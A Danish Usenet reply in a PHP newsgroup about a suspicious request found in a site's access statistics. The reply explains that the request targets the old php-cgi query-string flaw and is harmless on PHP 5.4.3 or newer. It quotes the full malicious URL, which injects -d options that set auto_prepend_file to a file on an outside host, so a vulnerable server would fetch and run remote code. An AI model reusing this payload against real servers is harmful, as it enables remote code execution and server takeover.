Path: csiph.com!eternal-september.org!feeder.eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail From: Jan Hansen Newsgroups: dk.edb.internet.webdesign.serverside.php Subject: Re: Ondsindet request Date: Wed, 15 Apr 2020 14:19:06 +0200 Organization: A noiseless patient Spider Lines: 25 Message-ID: <20200415141906.726ca602f38e2a74861b5b75@gmail.com> References: <1tdp12me6kivq.dlg@lundhansen.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Injection-Info: reader02.eternal-september.org; posting-host="6ecfaf4b687ddb4ed46085587d261ad3"; logging-data="3502"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX18FQchpJDOdX79LiYgCfAZkGbxiUzgKBLQ=" User-Agent: Sylfide for Fedora (sylpheed.sraoss.jp) Cancel-Lock: sha1:J88aXqdeIJUugmJPE+2+9DOsMDs= face: iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAMAAABg3Am1AAAAM1BMVEVAAAAEAgccGRcrKytDLQd pRQVKTEyPYw5naGazfQTNlQi3mFehnZfxuADsyBPLzMn6/PhA/qUdAAAAAXRSTlMAQObYZgAAAA FiS0dEAIgFHUgAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfgAg8RLTjt/9kiAAABlklEQVRIx7WV27qEIAiFB80TI+H7P+0Gm4OWTXax+bqi9csSjR6PccDjTsArburtLPFeP/pJ4g1YM+cKuvgfwKsZG/2sJV9Y9FyKnwSyZQ+R9ZkDojbURwCeruCI8GlqhQkCbCJaJchNAg6rfl3xHoCYZi0FFDHiM8thTBDgWYiUMrOBaKYAzk+Rl8Izt0PaX1ijlO2s4UqfRbjJS8nXJcCUNi6vrFzVDrAXhH6Y6qY60o3kayA36wvhwf4gQBrfORIEwPwEuOwi2h/DAPYFtIappk5uEZQjANXUiSN/BAqc7kLyeQCY086eAmYM6Gzke0AdRkfAnFlCMgNLbLbRP9LTgKC1AgYPepktMo1g31hZRIG0HlevEXb7YEnJrmWy9cBbXw1we/ekakpJFxwDJLPItIBIcas/tkSrzMf2rn7f0Bggio0lv7RvaAzg15CFDsC+pZ+0ey8v7XQ40ncFCIP8TaLf5sUHwO7kpG+IDfCNF4DpcNAhBMVU71pAjwBTGH/STqHglia1SCaFcD75nHN9Ytln/gB2JSmlFxN3ggAAAABJRU5ErkJggg== X-Newsreader: Sylpheed 3.7.0 (GTK+ 2.24.27; x86_64-unknown-linux-gnu) Xref: csiph.com dk.edb.internet.webdesign.serverside.php:7254 Bertel Lund Hansen skrev: > Jeg er ved at lege med lidt statistik på Fidusos sider, og i den > forbindelse aflæste jeg bl.a. $_SERVER['REQUEST_URI']. Jeg skrev > de fundne data til en tekstfil som jeg så vil bearbejde med et > statistikprogram. > > I datafilen forekom så følgende request: > /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp://tenderplus.spb.ru//components/com_foxcontact/default.txt Hvis du bruger php 5.4.3 eller nyere på det domæne, sker der ikke noget ved det. Fra : "sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. ". -- mvh Jan. Help Microsoft stamp out piracy. Give Linux to a friend today!